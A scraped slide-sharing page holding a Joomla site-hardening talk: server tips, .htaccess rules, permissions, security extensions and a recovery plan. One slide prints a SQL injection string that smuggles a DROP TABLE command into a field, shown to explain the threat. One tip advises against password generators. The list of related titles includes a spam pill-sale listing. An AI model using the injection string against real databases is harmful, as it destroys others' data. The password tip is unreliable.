Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 

Hidden Secrets For A Hack-Proof Joomla! Site

  • 1. HIDDEN SECRETS FOR A HACK-PROOF JOOMLA! Daniel Kanchev @dvkanchev
  • 2. BEFORE WE BEGIN … ✓ 7+ Years Of Joomla! Experience ✓ 6 Years With SiteGround ✓ Love Travelling The World ✓ Addicted To Extreme Sports
  • 3. WHO SHOULD CARE ABOUT SECURITY ? ✓ Application/Extension Developers ✓ Hosting Providers/System Administrators ✓ YOU (End Joomla! Users)
  • 4. EVERYONE WHO SHOULD CARE ABOUT SECURITY ? ✓Application/Extension Developers ✓Hosting Providers/System Administrators ✓YOU (End Joomla! Users)
  • 5. WHY SHOULD YOU CARE ? ✓ Be Trustworthy By Protecting Your Clients’ Data ✓ Have A Healthy Site - Avoid Substantial Data Loss/Downtime
  • 8. SECURITY IS A PROCESS! ! ! KEEP CALM IT’S NOT ROCKET SCIENCE
  • 9. IS YOUR SERVER SETUP RIGHT?
  • 10. SERVER CONFIG & TIPS ✓ Always Update Your Server Software ✓ Harden The Linux Kernel - grsecurity ✓ Chroot Processes ✓ Provide Only Restricted Shell Access ✓ Disable/Remove Unused Services SOLUTIONS: 1H Hive, Better Linux, CloudLinux
  • 11. PROTECT YOUR WEB SERVER ✓ OWASP Rules - http://goo.gl/rC7Uz ✓ Atomic Rules - http://goo.gl/Fv3Vn ✓ Trustwave Paid Rules - http://goo.gl/9IAaB
  • 15. #2: DO THE BASICS ✓ Change The Default “admin” username ✓ Change The Default “jos_” DB Prefix ✓ Password Protect Your Administrator Folder
  • 16. #3: RESTRICT THE ADMIN AREA BY IP ✓ Step 1: Check Your IP: whatismyip.com ✓ Add This Rule To Your .htaccess File deny from all allow from YOUR_IP_ADDRESS
  • 17. #4: KEEP PHP SCRIPTS IN THE RIGHT FOLDERS <Files *.php> deny from all </Files>
  • 18. #5: USE BULLET-PROOF PASSWORDS ✓ Avoid password generators ✓ Don’t use common words ✓ Avoid personal info, names and significant dates: daniel123
  • 19. THE PERFECT PASSWORD ✓ Choose A Favourite (Not Famous) Movie Quote/Phrase From A Book: We all go a little mad sometimes ✓ Add Punctuation Symbols (?!.,:) And Capital Letters, Remove Whitespaces: We.all?go!AlittleMad2sometimes
  • 20. #6: CHECK YOUR EXTENSIONS ✓Joomla! Vulnerable Extensions List (VEL): http://vel.joomla.org/ ✓National Vulnerability Database: http://web.nvd.nist.gov/view/vuln/search
  • 21. #7: STAY ON TOP OF SECURITY UPDATES ✓http://feeds.joomla.org/JoomlaSecurityNews ✓http://feeds.joomla.org/ JoomlaSecurityVulnerableExtensions
  • 22. BUILD A JOOMLA! SECURITY RSS FEED HOW TO DO IT: http://is.gd/Vze1Zo
  • 23. #8: FIX YOUR PERMISSIONS AND OWNERSHIP ✓Folders: 0755 ✓Files: 0644 ✓All files/folders should be owned by your main FTP user ✓NEVER EVER USE 777 permissions
  • 24. #9: ADDITIONAL PROTECTION THROUGH .htaccess FILE ✓ Remove PHP Sensitive Information ✓ Avoid Visual FingerPrinting ✓ Block Some Popular Tools Used By Hackers How To Do It: http://is.gd/pGfVXQ
  • 25. #10: USE JOOMLA! SECURITY EXTENSIONS FOR IDS/IPS ✓jHackGuard ✓ Akeeba Admin Tools ✓ jomDefender ✓jSecure
  • 26. SQL INJECTION SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
  • 27. jHackGuard SETUP ✓ SQL Injections ✓ Remote URL/File Inclusions ✓ Remote Code Execution ✓ XSS Based Attacks
  • 31. DISASTER RECOVERY PLAN 1. Create A Copy Of The Hacked Site + All Logs 2. Restore From A Clean Backup 3. Quarantine Your Site - Maintenance Mode 4. Check The Logs For The Malicious Code 5. Resolve The Security Issues/Clean Malicious Code 6. Unquarantine Your Site
  • 32. FEW THINGS TO TAKE AWAY ✓ Security Is About Making It Harder To Infiltrate - Not Making It Impossible ✓ Security Is An Ongoing Process ✓ Everyone Is Involved
  • 34. THANK YOU! Daniel Kanchev @dvkanchev